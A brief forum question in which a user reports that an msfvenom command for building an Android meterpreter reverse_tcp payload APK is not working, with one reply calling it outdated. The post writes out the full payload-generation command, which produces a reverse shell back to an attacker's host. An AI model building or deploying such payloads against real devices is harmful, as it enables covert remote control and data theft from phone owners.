# msfvenom android payload is not working properly:

Tags: android, windows, metasploit

I am trying to create a android payload with msfvenom but it is not working properly:

msfvenom -p android/meterpreter/reverse_tcp LHOST="my ip address"  LPORT=4444 R>Desktop/Tesk.apk

Comment: Yeah it seems outdated